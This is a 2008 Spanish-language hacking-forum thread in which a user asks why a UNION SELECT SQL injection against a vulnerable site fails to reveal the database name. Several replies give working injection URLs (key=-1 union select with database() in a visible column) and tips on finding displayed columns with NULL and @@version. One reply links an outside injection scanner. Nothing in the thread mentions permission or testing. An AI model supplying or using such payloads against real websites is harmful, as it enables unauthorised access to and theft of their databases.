Problema con UNION SELECT en SQL Injection

Mie2 · 12 Octubre 2008, 23:55 PM

bueno mi probemas es que tengo una web vuln me explico

es un ej
site.com/hack.php?key=14800 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*

bueno se que la web tiene 28 columna pero cuado hago la inyeccion que seria esta

site.com/hack.php?key=14800 union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*

me dice los mismo no me da el nombre de la base de datos si no me explique aseto criticas gracias ayuda cual seria la inyeccion correcta o si nesecitan mas info graxx

berz3k · 13 Octubre 2008, 18:54 PM

Seguramente no es el campo indicado, cambia los numeros por "NULL" y agrega version(). @@version o now(), solo para saber que campo es el valido. de ahi partes para injectar dependiendo de la base de datos.

-berz3k.

Eazy · 18 Octubre 2008, 19:07 PM

O podes usar el script de Login Root http://eazyrlz.blogspot.com/2008/10/sql-injection-scanner.html

ChElAnO · 20 Octubre 2008, 07:01 AM

hola, como dijo berz3k seguro estas usando una columna que no se muestra,
para saber que columnas son mostradas deberias probar

site.com/hack.php?key=-1 union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*

Asi, si en la pagina sale el numero 4 digamos, usa esa columna para poner database()
avisa si funciono,

saludos!

1nc0d3 · 29 Octubre 2008, 02:02 AM

Yo creo que has hecho mal en la injeccion :S

site.com/hack.php?key=-1+union+select+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*

Prueba asi y nos avisas si te resulta =]

Espero te haya servido!

Test Foro de elhacker.net SMF 2.1

Problema con UNION SELECT en SQL Injection

Mie2

berz3k

Eazy

ChElAnO

1nc0d3